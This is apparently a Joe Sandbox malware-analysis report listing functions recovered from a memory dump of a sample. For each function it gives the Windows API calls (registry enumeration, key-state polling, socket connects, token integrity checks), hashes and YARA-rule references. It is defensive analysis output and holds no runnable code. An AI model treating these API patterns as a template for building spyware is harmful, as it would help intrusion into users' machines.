Instruction ID: b65d0739f56339c3e4e73ec4778559e17a61373cba9093bb172657370f2bcac3
Opcode Fuzzy Hash: 8be214acded02866bdc7ec21b5830a467c1b2dfd3b518c651e2de3e78680affc
Instruction Fuzzy Hash: A6513975A00215DFCB04EFA8C991DEDB7B5BF58320B14C05AE919AB352DB30ED86CB81

Function 00A72E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A73C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A72BB5,?,?), ref: 00A73C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A72EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A72F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A72F75
RegCloseKey.ADVAPI32(?,?), ref: 00A72FA1
RegCloseKey.ADVAPI32(00000000), ref: 00A72FAE

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 36a09592e21212679c486864391d51f7a7097263509f971aee801ec8d3eba7ee
Instruction ID: 8c41a52e764f335d343f8645ee141ed50c6a0aa49f0bec2fd6aa9cbaa93a7a19
Opcode Fuzzy Hash: 36a09592e21212679c486864391d51f7a7097263509f971aee801ec8d3eba7ee
Instruction Fuzzy Hash: CC511671208244AFD704EB64CD91FAAB7F9FF88314F04882DF59A97291DB30E955CB52

Function 00A7CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdbb8af267b482098eaad877b13b332618d8b8d505aa57fd71a6c69e09be78f4
Instruction ID: 04394c8425b3a7a0c22c4c8f44fe0ec52b313720a38b1fcbdfd3279f1539d2fa
Opcode Fuzzy Hash: fdbb8af267b482098eaad877b13b332618d8b8d505aa57fd71a6c69e09be78f4
Instruction Fuzzy Hash: 4E41B439A00214AFD720DF68CC44FA9BB79EB09320F14C169F95DA72D2D774AD41DA50

Function 00A61206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A612B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A612DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A6131C

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A61341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A61349

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: e94a3472c44de406db78daaf9de8b7bf4290dd2ae24dedd99533fab066b5569a
Instruction ID: 78c423051f972db18251e861ea0a0b60ae3560dcd955109bb370ba24316ca017
Opcode Fuzzy Hash: e94a3472c44de406db78daaf9de8b7bf4290dd2ae24dedd99533fab066b5569a
Instruction Fuzzy Hash: C541FC35A00105DFCB01EF64CA91AAEBBF5FF08314B148099E916AF3A1DB31ED41DB51

Function 00A2B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00A2B64F
ScreenToClient.USER32(00000000,000000FF), ref: 00A2B66C
GetAsyncKeyState.USER32(00000001), ref: 00A2B691
GetAsyncKeyState.USER32(00000002), ref: 00A2B69F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: c9ef13f5c00959f5f1de26777148c67655204465730785b4425d7c3f996344b0
Instruction ID: 68a67a9152b763c883c116e1cfbb0c14dea551b2502b21fdf35b945be1e45c16
Opcode Fuzzy Hash: c9ef13f5c00959f5f1de26777148c67655204465730785b4425d7c3f996344b0
Instruction Fuzzy Hash: E9412D35604115FBDF15AF68CC44AE9BBB5BF05324F10832AF869962D0CB30AD94EFA1

Function 00A4B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A4B369
PostMessageW.USER32(?,00000201,00000001), ref: 00A4B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A4B41B
PostMessageW.USER32(?,00000202,00000000), ref: 00A4B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A4B431

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 820d8e00a73ca6552b18d520eac552b89ce3cfcfc18d3208863c5c8959aa4a06
Instruction ID: 1f9f41fd72a3d544249921438403491cfa35e9b908cbce29f4e274e7726a2198
Opcode Fuzzy Hash: 820d8e00a73ca6552b18d520eac552b89ce3cfcfc18d3208863c5c8959aa4a06
Instruction Fuzzy Hash: 6C31DF71910219EBDF04CFA8DD4DADE3BB5EB44315F104229F921AB1D1C7B0E955CBA0

Function 00A4DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00A4DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A4DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A4DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A4DC52
_wcsstr.LIBCMT ref: 00A4DC5C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 2855b4eaf820c66f7cedf1d8cb178eb0d9eb8d1c6f60cf0474b08b901e388a8b
Instruction ID: 08b4fc57c617c8afa8a92fbd916ccf9fc7df3492ce8afa5f0dfdd4116a8916c9
Opcode Fuzzy Hash: 2855b4eaf820c66f7cedf1d8cb178eb0d9eb8d1c6f60cf0474b08b901e388a8b
Instruction Fuzzy Hash: 0B212676204200BFEB159F799D89E7B7BB8DF85750F10403AF909DA191EEA1CC41D2A0

Function 00A4BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A4BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A4BCC2
__itow.LIBCMT ref: 00A4BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A4BD00
__itow.LIBCMT ref: 00A4BD11

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: f8455659518837bb21540ee000ff0367aeca4808d8b796728fda699ccfa757cf
Instruction ID: 7956a89286905cd19d6251d73153f70220251a84fe45745bf56d288b2bf1e2cc
Opcode Fuzzy Hash: f8455659518837bb21540ee000ff0367aeca4808d8b796728fda699ccfa757cf
Instruction Fuzzy Hash: 0121F639B10318BADB10AF758E86FDE7A69AFC9350F101065FA06EB182DB60C94583B1

Function 00A56318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00A150E6: _wcsncpy.LIBCMT ref: 00A150FA

GetFileAttributesW.KERNEL32(?,?,?,?,00A560C3), ref: 00A56369
GetLastError.KERNEL32(?,?,?,00A560C3), ref: 00A56374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00A560C3), ref: 00A56388
_wcsrchr.LIBCMT ref: 00A563AA

Part of subcall function 00A56318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00A560C3), ref: 00A563E0

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: a5393d0d5cb3967130a1c5f42f7591d3be275ab40e1a07d323400371187587aa
Instruction ID: 7b03ceae86f48a03c0ffe7a8a0291ad08ecb060cf5098ac07e0d43039ceceb8f
Opcode Fuzzy Hash: a5393d0d5cb3967130a1c5f42f7591d3be275ab40e1a07d323400371187587aa
Instruction Fuzzy Hash: 1521D8316046159ADB25EB78AD42FEA236CFF09372F900476F845DB0D0EF70D9C98A54

Function 00A68B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00A6A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A68BD3
WSAGetLastError.WSOCK32(00000000), ref: 00A68BE2
connect.WSOCK32(00000000,?,00000010), ref: 00A68BFE

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 2bcbd8ed1216843f55cdb76a24dcbb8faa63a0f7269feb49e51445013d0343e0
Instruction ID: 787cec1dc8beb4b2360f86dc7cdf95f998ecb201748095f99bf15c1892ba9974
Opcode Fuzzy Hash: 2bcbd8ed1216843f55cdb76a24dcbb8faa63a0f7269feb49e51445013d0343e0
Instruction Fuzzy Hash: 5D2190313002149FCB10EFA8CD85B7E77BDAF48720F048559F956AB292CF78AC468B61

Function 00A68420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A68441
GetForegroundWindow.USER32 ref: 00A68458
GetDC.USER32(00000000), ref: 00A68494
GetPixel.GDI32(00000000,?,00000003), ref: 00A684A0
ReleaseDC.USER32(00000000,00000003), ref: 00A684DB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 25b356f2a9034725deee0313ab454f4ec69e36bccebb7b38b0cf37ab9157ae10
Instruction ID: 12d11ca42934f0c6a942d6a3cb06a650e5b9ad111c426ee898c25a9265ecf821
Opcode Fuzzy Hash: 25b356f2a9034725deee0313ab454f4ec69e36bccebb7b38b0cf37ab9157ae10
Instruction Fuzzy Hash: 5E21C335B00204AFD700DFA4CE89AAEBBF9EF48301F048479E95A97251DF70AC41CB60

Function 00A2AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00A2AFE3
SelectObject.GDI32(?,00000000), ref: 00A2AFF2
BeginPath.GDI32(?), ref: 00A2B009
SelectObject.GDI32(?,00000000), ref: 00A2B033

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: bbb3bacbf3f28cb6863021783796d69606bfcf0ad2196f8583a30b94232b0ebf
Instruction ID: 53c167f237b3345c14652807d0b2f8c72f3cd912c762ce83a0a5ce4ec79d54b8
Opcode Fuzzy Hash: bbb3bacbf3f28cb6863021783796d69606bfcf0ad2196f8583a30b94232b0ebf
Instruction Fuzzy Hash: EE219DB5911315FFDB11DFD8FD48BAA7B68BB20355F14832BF422960A0C3708982CBA0

Function 00A3217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00A321A9
CreateThread.KERNEL32(?,?,00A322DF,00000000,?,?), ref: 00A321ED
GetLastError.KERNEL32 ref: 00A321F7
_free.LIBCMT ref: 00A32200
__dosmaperr.LIBCMT ref: 00A3220B

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: f57ec6068a13e870744ce707f67db1759e485f5f4bdec305000fb35946cc2b1b
Instruction ID: a55029eb784ab9ef4112a173aaffd937a6a82357910f2d66cefc4d0c4580ce80
Opcode Fuzzy Hash: f57ec6068a13e870744ce707f67db1759e485f5f4bdec305000fb35946cc2b1b
Instruction Fuzzy Hash: BB11D673204306AFDB21AFA5DE41EAF7BA8EF05770F10052AF91496191EB71D85187A1

Function 00A4ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00A4ABD7
GetLastError.KERNEL32(?,00A4A69F,?,?,?), ref: 00A4ABE1
GetProcessHeap.KERNEL32(00000008,?,?,00A4A69F,?,?,?), ref: 00A4ABF0
HeapAlloc.KERNEL32(00000000,?,00A4A69F,?,?,?), ref: 00A4ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00A4AC0E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 16bfd331b500463d6a503d9acc00662135bb9f0c9265d301f867cc2a29575158
Instruction ID: 80519d5d80893363c4dc34ee5b11d9a5e6a79dee3835af2a31680e060fe771c5
Opcode Fuzzy Hash: 16bfd331b500463d6a503d9acc00662135bb9f0c9265d301f867cc2a29575158
Instruction Fuzzy Hash: 1D011975350204BFDB108FE9DC88DAB3BADEF9A755714052AF945C3260DA719C81CF61

Function 00A49ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00A49ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00A49AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00A49B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00A49B15
CLSIDFromString.OLE32(?,?), ref: 00A49B21

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 26f52de80bd798164a151b3c03026ff9cf6e173825c56189881d68ac59ad38f8
Instruction ID: 0128236985dac553bd854b02d26b1a1b73cb487fa293a3c84969599f7a2738a7
Opcode Fuzzy Hash: 26f52de80bd798164a151b3c03026ff9cf6e173825c56189881d68ac59ad38f8
Instruction Fuzzy Hash: D7018F7A700204BFDB108F98ED88B9B7AFDEB84392F148029F905D2210DB70DD529BA0

Function 00A57A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A57A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A57A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A57A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A57A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A57AD0

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 381008f80d3e583f6a53b4df7903eb5c798e229240eaf1b5b75dda54fbe4debb
Instruction ID: 82850f7d3dba5038020386c866fd6e5da985323d9851686938a22698ffc05adb
Opcode Fuzzy Hash: 381008f80d3e583f6a53b4df7903eb5c798e229240eaf1b5b75dda54fbe4debb
Instruction Fuzzy Hash: 7E014C72D04619EBCF00EFE5EC88ADDBB78FF08792F110556EA02B2150DF30969987A1

Function 00A4AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A4AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A4AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A4AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A4AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A4AB10

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: e35ab36aa1b24aeaa49ebff3a8b441f6773c190bc8bbf51c037d577e00b6c670
Instruction ID: 0cb160aed6e2947bd75ff941078117abefa55f9508ddd3c383ae6828a54d211a
Opcode Fuzzy Hash: e35ab36aa1b24aeaa49ebff3a8b441f6773c190bc8bbf51c037d577e00b6c670
Instruction Fuzzy Hash: 76F04F753402086FEB114FA4EC88E673B6DFF85795F10012AFA42C7190CA609C538A61

Function 00A4AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A4AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A4AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A4AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A4AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A4AAAF

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

